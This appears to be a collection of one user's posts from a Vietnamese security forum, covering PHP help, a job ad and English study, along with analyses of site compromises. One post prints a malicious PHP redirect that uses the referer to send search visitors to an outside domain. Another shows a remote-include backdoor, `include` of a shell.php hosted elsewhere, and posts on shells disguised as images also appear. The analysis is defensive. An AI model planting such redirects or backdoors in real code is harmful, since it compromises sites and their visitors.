|
|
vikjava wrote:
quanta wrote:
Trước hết, cảm ơn bài viết rất tâm huyết của Doremon.
Với một người đã "chót" học ngược như mình và trình độ hiện tại ở mức như này:
- Đọc: OK, không gặp khó khăn gì khi đọc sách kỹ thuật cả.
- Viết: có thể gửi vấn đề mà mình đang gặp phải lên forum, Q&A, mailing list, ... nhưng đôi khi cảm thấy bí từ, không diễn đạt được trọn nghĩa muốn nói (như đã từng đọc ở đâu đó). Lý do thì vợ mình có nói "anh đọc nhiều, nhưng anh không note lại thì làm sao anh nhớ được. Học tiếng Anh thực chất là bắt chước mà, đọc một mẫu câu hay anh phải note lại, khi gặp hoàn cảnh tương tự, tự nhiên anh sẽ nhớ ra."
- Nói: kém hơn viết, ở mức có thể trả lời các câu hỏi phỏng vấn.
- Nghe: kém nhất do xử lý chậm.
Doremon có lời khuyên gì đặc biệt không?
PS: nếu "máu" lắm thì mỗi ngày cũng chỉ dành ra được 1, 2 tiếng thôi.
Anh em vui lòng tư vấn giùm case study này. Các thành phần chém gió vui lòng lên facebook của mình tự sướng
p/s: theo mình mọi người không nên nhảy vô tranh luận với tmd nữa làm gì, sẽ gây loãng topic và không đi đến đâu, tốn thời gian không đem đến ích lợi gì.
Học ngược được dư kia thì ngon quá rầu còn giề
|
|
|
Code:
Code:
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"live.com") or stristr($referer,"webalta") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com/l") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://opec.lflink.com/");
exit();
}
}
}
}
}
Chú ý đoạn detect referer, agent sau đó location!
|
|
|
Thêm nội dung HTML file main cho anh em nào muốn vọc!
Nhìn đống script đến khiếp
http://pastebin.com/3BbYfFUu
Đập vào mắt đầu tiên là kiểu ob giống giống cái js ob của tụi Nga em vừa xem hôm trước:
Line: 4,5,6,7
Code:
try{new 123;}catch(fvegern){v="e"+"v"+"a";p="p"+"r"+"o"+"to";}
v+="l";
p+="type";
=> eval , prototype
Line: 10
Code:
if(fr)dd=d["getElem"+((1)?"entsB":"")+"yTagName"]("script");
=> getLementsByTagName
Line: 29
Code:
if(ch&&fr)qq2=e("q"+"q")[((ch&&fr)?"f"+"romCharC"+"o"+"de":"")];
=> fromCharCode
Line 31:
Code:
vv=a[((1)?"su":"")+"bs"+"tr"](i,2-1);
=> substr
Nó ob ác gớm nhưng chưa lẩn kinh bằng con của tụi Nga.
Tối về rảnh vọc tiếp!
|
|
|
Anh conmale dự đoán năm con rồng chuẩn thế
|
|
|
Mở log ra đi bạn!
|
|
|
viethungs wrote:
Anh ơi, có thông tin công ty không ạ ?
Sorry dạo này ít vào HVA nên không reply luôn cho bạn được.
Bạn kiểm tra tin nhắn trên diễn đàn nhé.
PS: Cái đề của gamma không chạy được đâu bạn crc32
Thanks!
|
|
|
TN đến giờ vẫn khá xôm tụ trong trò ăn Xê Xê mà!
|
|
|
Hi all.
Bên mình đang cần tuyển 10 PHP Developer
+ Yêu cầu :
- Tối thiểu 1 năm kinh nghiệp lập trình Web Application trên nền Php.
- Thành thạo MySQL, Javascript, Ajax, Css, Html...
- Có khả năng đọc hiểu tài liệu tiếng Anh ...
+ Điểm cộng :
- Có kinh nghiệm làm việc với các hệ thống lớn.
- Có kinh nghiệm làm việc với Memcached, Redis,NoSQL ...
- Có kinh nghiệm làm việc trên nền Linux.
- Có kinh nghiệm caching, performance tuning.
+ Quyền lợi :
- Được làm việc các hệ thống lớn.
- Chính sách BHXH, BHYT, BHTN (bảo hiểm thất nghiệp) và các phúc lợi khác theo quy định Luật lao động
- Hỗ trợ ăn trưa.
- Mức lương cạnh tranh.
+ Địa điểm làm việc : Hà Nội
Bạn nào có hứng thú thì gửi CV vào canhnm@opensource.com.vn cho mình nhé.
Cảm ơn!!!
|
|
|
Hôm nay bật thử cái monitor để compare thì thấy nội dung file http://wide.ircop.cn/index.txt?113
http://pref.firebay.cn/index.txt?113
đã thay đổi
Up lên đây đề phòng nó change phát nữa :
http://www.mediafire.com/?fiazi6a1jmyzmci
http://www.mediafire.com/?zba22ipikm1fqzp
|
|
|
Tối lỡ uống gần 1 cốc đen đặc không ngủ được.
Lên kéo cái autoit về viết cái toy trên windows chơi thử:
http://www.mediafire.com/?ioyq3101k2l1rhm
Chức năng là monit đống links trong file sotilon.txt, nếu sau có thêm link khác thì cứ add thêm vào dòng cuối.
Nếu lần download sau có sự thay đổi sẽ ghi ngày giờ ra log file log.txt
Bạn nào dùng windows thì lập cho file stl_mon.exe 1 cái schedule vài phút run 1 lần cho nó compare.
Mình chưa test kĩ được, nếu ai dùng mà thấy có lỗi gì pm mình mình sửa
Trước cứ tưởng autoit chỉ để viết virus
//tí quên, có 3 folder trong đó thì đừng del cái nào đi nhé các bạn. 1 cái để chứa file download lần trước, 1 cái để chứa file tạm cho việc compare, 1 cái để move file thay đổi vào.
|
|
|
xnohat wrote:
FaL wrote:
Thời gian vừa qua rất nhiều website ở ta bị deface, việc kiện toàn bảo mật cho website đang là một vấn đề khá nóng bỏng. Chủ đề này không đi sâu vào việc kiện toàn bảo mật cho server chứa ứng dụng web, mà thảo luận về việc nhận biết backdoor của web-application không có nguồn gốc rõ ràng.
Thực tế có rất nhiều website sử dụng mã nguồn mở, nhưng kèm theo đó, chủ nhân của website cũng dùng rất nhiều module, component khác không có nguồn gốc rõ ràng (các hacked templates, hacked components,...). Dùng các source này nghĩa là bạn đã chấp nhận phiêu lưu với độ an toàn website của mình. "Source code của ứng dụng có chứa backdoor hay không?" luôn là câu hỏi thời sự. Vậy có cách nào nhận biết, phòng tránh trường hợp này không?
Mời các bạn cùng tham gia thảo luận!
Cái này khó lắm à nha
Việc cài lại các shell script được trích xuất từ các shell script nổi tiếng như C99, r57 ( php ), JMXshell ( JSP )... là chuyện script kiddies mới làm, vì quất lên antivirus phát là lòi ra ngay tức thì.
Các tay Null source cao tay thì thường chỉ chèn đoạn mã sau ( ví dụ với PHP ):
Code:
hay biết site đó thành zombies luôn
Code:
<?php
include("http://abcxyz.com/shell.php");
?>
Vụ trên gọi là "cố ý tạo ra lỗi"
Nếu chèn mã như trên thì khá căng , cần trình độ source debugging tốt để dò tìm lỗi bên trong source, đây hoàn toàn là công việc của một tester . Mà tay nào giỏi source debugging thì họ tự NULLED ứng dụng đó rồi, hoặc dư sức tự mua vì trình độ thế thì thường có công ăn việc làm ổn định
Dĩ nhiên cách trên có thể vô hiệu hoá bằng allow_url_fopen=Off ( với PHP ), nhưng lỗi trên vẫn dễ dàng tạo điều kiện cho Local File Inclusion với nhiều phương pháp khai thác nâng cao khác nhau
Với cái source nhỏ nhỏ thì còn dễ dò chứ giờ cái source nào tầm vài chục MB toàn text, rồi nó nhét đâu đó 1 cái form upload thì ...
|
|
|
Ar0 wrote:
Cái Cert đó có phản ánh đúng được khả năng code và sự am hiểu về PHP không nhỉ?
Theo mình biết thì nó phản ánh khả năng nhớ function =]]
|
|
|
Ar0 wrote:
Nói cho chính xác thì 3.5 năm đó không phải là thời gian chúng ta ngồi và code liên tục, mà trong đó còn là thời gian để chúng ta suy ngẫm và tìm ra cho mình cách học, cách tiếp thu, cách thể hiện khác, chúng ta còn phải loại đi những suy nghĩ sai, những cách học sai, cách tiếp thu không hiệu quả. Sau khi tìm ra được những điều đó thì học PHP không còn cảm thấy khó nữa.
Tớ từng quen 1 người cũng có thể nói là am hiểu về PHP, nhưng một lần nghe lão ấy nói lả làm PHP nhiều, code nhiều, học nhiều và ám dụng nhiều, nhưng ngoài các keyword và các hàm đơn giản thì không nhớ gì nhiều về PHP cả, khi nào cần dùng hàm nào phức tạp cứ lên PHP.net mà xem, không việc gì mà phải nhớ cho nhiều, không gian trống đó dành cho việc nhớ những thủ thuật và những giải thuật thì tốt hơn. Nghĩ lại cũng cảm thấy đúng, giá trị của một chương trình nằm trong đầu chúng ta thôi.
Thế thì ông này không thi Zend Cert được rồi
|
|
|
Phineas wrote:
Cám ơn bạn đã trả lời,
Thực ra do yêu câu của khách hàng, trang web mình viết có chức năng tương tự như meebo.com hay imo.im.
Hiện nay mình đang làm y chang như cách bạn nói, bên client dùng XMLHTTPObject bằng tay để cập nhận dữ liệu. Khổ nỗi, kiểu PULL này ngốn tài nguyên cả client lẫn server nhiều quá, do cứ định kỳ client lại request về server (y chang DoS), nên mình phải cần thêm khả năng PUSH từ phía server. <b>Không biết có thể giải quyết vấn đề này trong phạm vi web app php thông thường không nhỉ? Hay chỉnh lại config của Apache cũng được</b>
Cái RAW socket bạn nói là một dạng embedded webserver, mình mới google ra
www.koanlogic.com/klone/ cho phép nhúng C vào trong mã HTML (hay nhúng mã HTML vào C, :-D). Cái này có vẻ mới nên không chắc là có ổn định không nữa. Bạn nào xài rồi thì đánh giá dùm mình với.
Xài embedded server chỉ là cách cuối cùng, khi không còn cách nào khác để PUSH dữ liệu từ server một cách hiệu quả trong phạm vi <b>Apache - PHP/HTML - webclient</b> (1)
Bạn nào biết cách giải quyết vấn đề PUSH từ server này theo mô hình (1) trên thì chỉ cho mình với.
Cám ơn rất nhiều.
Pull vẫn có khả năng giảm tải xuống nếu bạn đặt cho nó 1 ngưỡng delay.
Tìm hiểu Long-polling.
Để giảm tối đa thì dùng Http push để server chủ động 'đẩy' data xuống client nếu có thay đổi. Có 1 số keyword cho bạn :
Stream-hub : http://www.stream-hub.com/
CometD : http://cometd.org/,
NodeJs (Javascript Server Side) : http://nodejs.org/, thằng này support cả C/C++ addon có lẽ phù hợp nhất với bạn.
Nginx http://wiki.nginx.org/3rdPartyModules xem mấy cái module HTTP PUSH, HTTP PUSH Stream)
...
Hoặc trong 1 số thằng trên có support streaming thì bạn có thể dùng luôn cách streaming thử xem sao.
Websocket thì tạm thời chưa nghĩ tới
|
|
|
khigiadano wrote:
Hi.
Giúp mình chuyển 1 mốc thời gian ra 1 con số duy nhất bằng lệnh C# để mình dễ so sánh được không ?
Tức là số giây hoặc ngày, giờ đã trải qua trong lịch sau công nguyên. 1 con số duy nhất
Mình không dùng C#, nhưng cũng không cần thiết phải dùng C# để convert, dùng luôn mysql function cũng được!
http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html#function_unix-timestamp
|
|
|
Dựa vào state : http://msdn.microsoft.com/en-us/library/ms534361%28v=vs.85%29.aspx
|
|
|
Bạn tham khảo http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html
Chú ý 2 hàm DATEDIFF và TIMEDIFF.
|
|
|
m3onh0x84 wrote:
Bà con ai có cho em xin bộ này đc k0 ạ , google ra toàn links chết từ hồi nào rồi
├── 1 Beginner
│ └── ****OReilly.Learning.Python.3rd.Edition.Oct.2007.pdf
├── 20Learn to Program Using Python 1st edtion.zip
├── 20Perl To Python Migration - 2001 - (By Laxxuss).chm
├── 20Python Essential Reference, Second Edition.rar
├── 20Python Guide - For Beginners.zip
├── 2 Intermediate
│ ├── Begining Python - From Novice to Professional.pdf
│ ├── Programming Python, 3rd Ed Aug2006.pdf
│ ├── Programming Python 3rd Edition.chm
│ ├── Python Cookbook, 2nd Edition.chm
│
├── 3 Advanced
│ ├── O'Reilly.Python.in.a.Nutshell.2nd.Edition.Jul.2006.chm
│ └── Python Essential Reference, 2nd Edition.pdf
├── 4 Network Programming
│ ├── Foundations_of_Python_Network_Programming.djvu
│ ├── OReilly.Python.for.Unix.and.Linux.System.Administration.Sep.2008.pdf
│ └── O'Reilly-Twisted Network Programming Essentials - By Abe Fettig - 2005.chm
Thiếu thì hú mình 1 phát
http://www.mediafire.com/?qjdk4co5spian
|
|
|
huyannet wrote:
Những phần mềm quản lý database có thể mã hoá 1 chuỗi sang MD5, đương nhiên nó có thể làm ngược lại, là giải mã nó ra. Chỉ cần vào database lưu pass user sau đó chọn lại kiểu mã hoá là xem được pass.
1 số file CHM có bài viết liên kết trực tuyến với host, vì thế nhà bác nào không có mạng thì không xem được.
Host die cũng không xem được.
Bạn chứng mình đoạn màu đỏ hộ mình nhé
Đây là MD5 của một chuỗi "cb7708006e70c9155334d65a1c81d936" được lưu trong MySQL .
|
|
|
phanthecong wrote:
sao mình làm gửi mail dùng hàm mail($to, $subject, $message, $headers) mà nó lại không gửi được khi hỏi người quản lý host thì họ nói là cần thêm user name và pass nữa mới gửi được, mà mình xem trên trang php.net thì cũng đâu cần user name, pass gì đâu, bạn nào bít chỉ mình nha.
Chắc ý họ bảo cậu dùng SMTP đấy
|
|
|
kissyoudh7 wrote:
Bạn giải thích rõ hơn được ko
Mình chỉ biết mình local được thế này
// --- mySQL set-up...
$dbusername="azimuth";
$dbpassword=" pass ";
$dbname="azimuth";
$dbhost="localhost";
Cậu thử tìm hiểu bind-address trong my.cnf
//my.cnf
bind-address = xxx.xxx.xxx
Nếu cấu hình để bind-address = localhost thì remote connect được không ?
Ngoài ra tìm hiểu thêm về GRANT của MySQL.
|
|
|
Phó Hồng Tuyết wrote:
sai rồi bi, đối với một số server khi firewall defaults hoặc stop hoặc vì một lý do nào đó mà firewall không có hoặc không được áp dụng đúng thì cái việc kiểm soat session bằng php hoặc bằng captcha or bằng những cách thức tương tự thì nó chính là lá chắn cuối cùng của webmaster hoặc chí ít nó cũng là món thủ thân của webmaster khi không có access trên vps or server.
nếu bạn muốn tìm hiểu thì nên chú ý cái này :
Code:
; Automatically add files before or after any PHP document.
auto_prepend_file =
auto_append_file =
Anh giải thích hộ 2 cái cấu hình mục đích là để làm gì với trường hợp chủ topic muốn kiểm soát request với :
Code:
; Automatically add files before or after any PHP document.
auto_prepend_file =
auto_append_file =
Việc kiểm soát session bằng PHP có thì càng đỡ được chút ít với những trang nào có nhiều query đến SQL. Nhưng cẩn thận lại thành gậy ông đập lưng ông .
|
|
|
Anh thử dùng cái extension này xem sao, lâu rồi không đụng Joomla nên không rõ lắm :-p
http://extensions.joomla.org/extensions/access-a-security/backend-a-full-access-control/7010
|
|
|
Việc dùng \n sẽ có tác dụng xuống dòng trong tường hợp bạn dùng nó trong một chuỗi và muốn lưu chuỗi đó ra file hoặc lưu vào db.... Dễ hiểu hơn : PHP hiểu \n là xuống dòng chứ browser thì không.
Ví dụ :
Code:
$fp = fopen("text.txt","w");
$text = "Hello world! \n";
$context = "End exam!.";
fwrite($fp, $text.$context );
fwrite($fp, $text.$context );
Khi đó file text.txt sẽ có nội dung:
Hello world!
End exam!
Còn khi hiển thị trên trình duyệt hãy dùng function nl2br để \n được chuyển thành <br /> cho trình duyệt hiểu:
<?
echo nl2br($text.$context);
?>
|
|
|
growing wrote:
Sao lại bắt buộc phải dùng <br/>, mình thấy một số sách họ đều dùng \n mà. Ở http://vn.php.net/manual/de/language.types.string.php cũng viết là nếu dùng dấu " thì php biết \n là kí tự linefeed mà. Hok hiểu sao mình viết nó vẫn ko xuống dòng đc.
Bạn đọc chưa hết các comment bên dưới rồi : http://vn.php.net/manual/de/language.types.string.php#39173
|
|
|
holiganvn wrote:
@canh_nguyen:
em có nói thế bao giờ,em nghĩ up sh3ll thì để local thôi,bác thích bắt bẻ xin cứ tiếp tục
Hình như cậu nói nhưng không nghĩ hay sao ấy nhỉ ?
Để mình trích lại một số bài của cậu nhé :
holiganvn wrote:
site bạn đã bị mắc lỗi upload con sh3llc99.php nó thêm đuôi jpg thành sh3llc99.php.jpg lúc đó link sh3ll là: xxx.com/sh3l99.php.jpg,sau đó local là lên quyền admin ngay,tạm thời tắt tính năng upload đi đã,sau đó tìm và xóa sh3ll rồi xài cái mod security hoặc code lại toàn bộ site để bảo mật tốt hơn
holiganvn wrote:
mình nghĩ bạn nên kiếm 1 con sh3ll rồi tự upload nó lên ,local thì tự khắc sẽ biết
holiganvn wrote:
@all:đã local thì có rất nhiều con đường,nhớ hồi trước IPB có lỗi up sh3ll qua emotion smilie
Đọc lại xem có phải do chính mình viết không nhé
Hơn nữa cậu lại cố tình vòng vèo không đi vào vấn đề chính mà cậu là người nói ra là sau khi chèn code php vào file ảnh thì cậu thực thi nó thế nào ?
Mình lại phải copy lại câu hỏi từ post trước :
Nhưng cái mình thắc mắc với cậu là chèn xong rồi thì cậu làm thế nào để thực thi được con shell mà cậu đã chèn vào ảnh kìa. Cậu định nói đến việc thực thi nó bằng cách đánh trực tiếp đường dẫn dạng http://xxx.com/shell_picture.jpg à ?
|
|
|
holiganvn wrote:
canh_nguyen wrote:
learn2hack: Bồ có thể nói rõ hơn cách chèn php code vào ảnh jpg làm sao mà vẫn thực thi được không
hình như có dùng 1 soft nào đó nhét đoạn code sh3ll vào hoặc nếu không thì code php rồi cho nó tự download sh3ll về server,để em tìm lại đã
@all:đã local thì có rất nhiều con đường,nhớ hồi trước IPB có lỗi up sh3ll qua emotion
Không cần tìm lại đâu cậu search luôn key này cho nhanh : edjpgcom. Mà thực ra để chèn thì không cần thiết phải soft này, dùng photoshop hoặc một số phần mềm edit ảnh cũng làm được.
Nhưng cái mình thắc mắc với cậu là chèn xong rồi thì cậu làm thế nào để thực thi được con shell mà cậu đã chèn vào ảnh kìa. Cậu định nói đến việc thực thi nó bằng cách đánh trực tiếp đường dẫn dạng http://xxx.com/shell_picture.jpg à ?
Mà cậu cứ nhắc đi nhắc lại local làm gì thế ? Ở đây chủ topic đang bị tấn công kiểu gì mà cậu cứ lôi local vào vậy ?
|
|
|
|
|
|
|